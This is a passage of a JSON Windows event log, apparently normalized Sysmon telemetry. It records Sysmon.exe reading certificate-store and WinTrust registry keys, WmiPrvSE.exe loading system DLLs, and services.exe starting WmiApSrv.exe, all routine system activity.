"timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480420000, 
- "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - 
"timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "winsta.dll", - "image_path": "C:\\Windows\\System32\\winsta.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "utildll.dll", - "image_path": "C:\\Windows\\System32\\utildll.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480580000, - 
"unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\System32\\setupapi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "srvcli.dll", - "image_path": "C:\\Windows\\System32\\srvcli.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480730000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480730000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "logoncli.dll", - "image_path": "C:\\Windows\\System32\\logoncli.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480730000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480730000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", - "event_type": "process", - "logon_id": 999, - 
"parent_process_name": "services.exe", - "parent_process_path": "C:\\Windows\\System32\\services.exe", - "pid": 7720, - "ppid": 568, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "subtype": "create", - "timestamp": 131883573480880000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}", - "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480890000, - "unique_pid": 